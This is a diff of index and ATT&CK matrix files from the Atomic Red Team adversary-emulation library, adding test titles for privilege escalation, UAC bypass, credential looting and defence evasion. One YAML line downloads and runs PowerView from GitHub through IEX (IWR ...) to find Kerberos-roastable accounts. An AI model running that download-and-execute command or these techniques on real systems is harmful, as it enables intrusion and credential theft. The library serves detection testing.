+  - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
   - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
@@ -250,6 +277,7 @@
 - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
   - Atomic Test #1: Process Injection via mavinject.exe [windows]
+  - Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
 - T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -263,6 +291,8 @@
 - T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
+  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
   - Atomic Test #1: Logon Scripts [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -374,6 +404,10 @@
   - Atomic Test #15: UACME Bypass Method 56 [windows]
   - Atomic Test #16: UACME Bypass Method 59 [windows]
   - Atomic Test #17: UACME Bypass Method 61 [windows]
+  - Atomic Test #18: WinPwn - UAC Magic [windows]
+  - Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
+  - Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
+  - Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
   - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
   - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -406,6 +440,7 @@
   - Atomic Test #1: Control Panel Items [windows]
 - [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
   - Atomic Test #1: Access Token Manipulation [windows]
+  - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
 - [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
   - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
 - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
@@ -452,6 +487,7 @@
   - Atomic Test #27: Disable Defender with Defender Control [windows]
   - Atomic Test #28: Disable Defender Using NirSoft AdvancedRun [windows]
   - Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
+  - Atomic Test #30: WinPwn - Kill the event log services for stealth [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -460,6 +496,7 @@
 - T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
   - Atomic Test #1: Process Injection via mavinject.exe [windows]
+  - Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
 - T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -518,6 +555,8 @@
 - T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
+  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127.001 MSBuild](../../T1127.001/T1127.001.md)
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
@@ -648,7 +687,8 @@
 - [T1216.001 PubPrn](../../T1216.001/T1216.001.md)
   - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1620 Reflective Code Loading](../../T1620/T1620.md)
+  - Atomic Test #1: WinPwn - Reflectively load Mimik@tz into memory [windows]
 - [T1218.009 Regsvcs/Regasm](../../T1218.009/T1218.009.md)
   - Atomic Test #1: Regasm Uninstall Method Call Test [windows]
   - Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
@@ -708,6 +748,8 @@
   - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
   - Atomic Test #9: DiskShadow Command Execution [windows]
   - Atomic Test #10: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows]
+  - Atomic Test #11: Lolbin Gpscript logon option [windows]
+  - Atomic Test #12: Lolbin Gpscript startup option [windows]
 - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
   - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
   - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
@@ -732,7 +774,9 @@
   - Atomic Test #1: Named pipe client impersonation [windows]
   - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
+  - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
+  - Atomic Test #2: Lolbin Jsc.exe compile javascript to dll [windows]
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -831,6 +875,8 @@
   - Atomic Test #6: Create a new Windows admin user [windows]
 - [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
+  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
   - Atomic Test #1: Logon Scripts [windows]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -986,6 +1032,7 @@
   - Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
   - Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery [windows]
   - Atomic Test #14: Enumerate Root Domain linked policies Discovery [windows]
+  - Atomic Test #15: WinPwn - generaldomaininfo [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
   - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
   - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -1016,6 +1063,8 @@
 - [T1615 Group Policy Discovery](../../T1615/T1615.md)
   - Atomic Test #1: Display group policy information via gpresult [windows]
   - Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
+  - Atomic Test #3: WinPwn - GPOAudit [windows]
+  - Atomic Test #4: WinPwn - GPORemoteAccessPolicy [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Local Account](../../T1087.001/T1087.001.md)
   - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
@@ -1030,15 +1079,22 @@
 - [T1046 Network Service Scanning](../../T1046/T1046.md)
   - Atomic Test #3: Port Scan NMap for Windows [windows]
   - Atomic Test #4: Port Scan using python [windows]
+  - Atomic Test #5: WinPwn - spoolvulnscan [windows]
+  - Atomic Test #6: WinPwn - MS17-10 [windows]
+  - Atomic Test #7: WinPwn - bluekeep [windows]
+  - Atomic Test #8: WinPwn - fruit [windows]
 - [T1135 Network Share Discovery](../../T1135/T1135.md)
   - Atomic Test #3: Network Share Discovery command prompt [windows]
   - Atomic Test #4: Network Share Discovery PowerShell [windows]
   - Atomic Test #5: View available share drives [windows]
   - Atomic Test #6: Share Discovery with PowerView [windows]
   - Atomic Test #7: PowerView ShareFinder [windows]
+  - Atomic Test #8: WinPwn - shareenumeration [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
   - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
   - Atomic Test #4: Windows Internal Packet Capture [windows]
+  - Atomic Test #5: Windows Internal pktmon capture [windows]
+  - Atomic Test #6: Windows Internal pktmon set filter [windows]
 - [T1201 Password Policy Discovery](../../T1201/T1201.md)
   - Atomic Test #5: Examine local password policy - Windows [windows]
   - Atomic Test #6: Examine domain password policy - Windows [windows]
@@ -1046,6 +1102,7 @@
   - Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
   - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
+  - Atomic Test #2: WinPwn - printercheck [windows]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1057 Process Discovery](../../T1057/T1057.md)
   - Atomic Test #2: Process Discovery - tasklist [windows]
@@ -1077,6 +1134,9 @@
 - [T1518 Software Discovery](../../T1518/T1518.md)
   - Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
   - Atomic Test #2: Applications Installed [windows]
+  - Atomic Test #4: WinPwn - Dotnetsearch [windows]
+  - Atomic Test #5: WinPwn - DotNet [windows]
+  - Atomic Test #6: WinPwn - powerSQL [windows]
 - [T1497.001 System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
   - Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
@@ -1086,6 +1146,16 @@
   - Atomic Test #8: Windows MachineGUID Discovery [windows]
   - Atomic Test #9: Griffon Recon [windows]
   - Atomic Test #10: Environment variables discovery on windows [windows]
+  - Atomic Test #13: WinPwn - winPEAS [windows]
+  - Atomic Test #14: WinPwn - itm4nprivesc [windows]
+  - Atomic Test #15: WinPwn - Powersploits privesc checks [windows]
+  - Atomic Test #16: WinPwn - General privesc checks [windows]
+  - Atomic Test #17: WinPwn - GeneralRecon [windows]
+  - Atomic Test #18: WinPwn - Morerecon [windows]
+  - Atomic Test #19: WinPwn - RBCD-Check [windows]
+  - Atomic Test #20: WinPwn - PowerSharpPack - Watson searching for missing windows patches [windows]
+  - Atomic Test #21: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors [windows]
+  - Atomic Test #22: WinPwn - PowerSharpPack - Seatbelt [windows]
 - [T1614.001 System Language Discovery](../../T1614.001/T1614.001.md)
   - Atomic Test #1: Discover System Language by Registry Query [windows]
   - Atomic Test #2: Discover System Language with chcp [windows]
@@ -1154,6 +1224,8 @@
   - Atomic Test #18: Curl Download File [windows]
   - Atomic Test #19: Curl Upload File [windows]
   - Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
+  - Atomic Test #21: MAZE Propagation Script [windows]
+  - Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
   - Atomic Test #3: portproxy reg key [windows]
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1220,9 +1292,13 @@
   - Atomic Test #7: Headless Chrome code execution via VBA [windows]
   - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
   - Atomic Test #9: Office Generic Payload Download [windows]
+  - Atomic Test #10: LNK Payload Download [windows]
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1106 Native API](../../T1106/T1106.md)
   - Atomic Test #1: Execution through API - CreateProcess [windows]
+  - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique [windows]
+  - Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
+  - Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
 - [T1059.001 PowerShell](../../T1059.001/T1059.001.md)
   - Atomic Test #1: Mimikatz [windows]
   - Atomic Test #2: Run BloodHound from local disk [windows]
@@ -1303,6 +1379,7 @@
   - Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
   - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
   - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
+  - Atomic Test #6: MAZE FTP Upload [windows]
 - [T1567 Exfiltration Over Web Service](../../T1567/T1567.md)
   - Atomic Test #1: Data Exfiltration with ConfigSecurityPolicy [windows]
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1366,6 +1443,8 @@
 - T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
+  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1091 Replication Through Removable Media](../../T1091/T1091.md)
   - Atomic Test #1: USB Malware Spread Simulation [windows]

atomics/Indexes/Matrices/linux-matrix.md

@@ -11,7 +11,7 @@
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Storage Object Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clipboard Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Escape to Host](../../T1611/T1611.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/matrix.md

@@ -120,7 +120,7 @@
 |  |  |  |  | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Reflective Code Loading](../../T1620/T1620.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Regsvcs/Regasm](../../T1218.009/T1218.009.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Regsvr32](../../T1218.010/T1218.010.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rename System Utilities](../../T1036.003/T1036.003.md) |  |  |  |  |  |  |  |
@@ -155,7 +155,7 @@
 |  |  |  |  | [Timestomp](../../T1070.006/T1070.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -91,7 +91,7 @@
 |  |  |  |  | [Process Injection](../../T1055/T1055.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [PubPrn](../../T1216.001/T1216.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Reflective Code Loading](../../T1620/T1620.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Regsvcs/Regasm](../../T1218.009/T1218.009.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Regsvr32](../../T1218.010/T1218.010.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rename System Utilities](../../T1036.003/T1036.003.md) |  |  |  |  |  |  |  |
@@ -120,7 +120,7 @@
 |  |  |  |  | [Timestomp](../../T1070.006/T1070.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/index.yaml

@@ -356,6 +356,17 @@ credential-access:
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
         name: powershell
+    - name: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
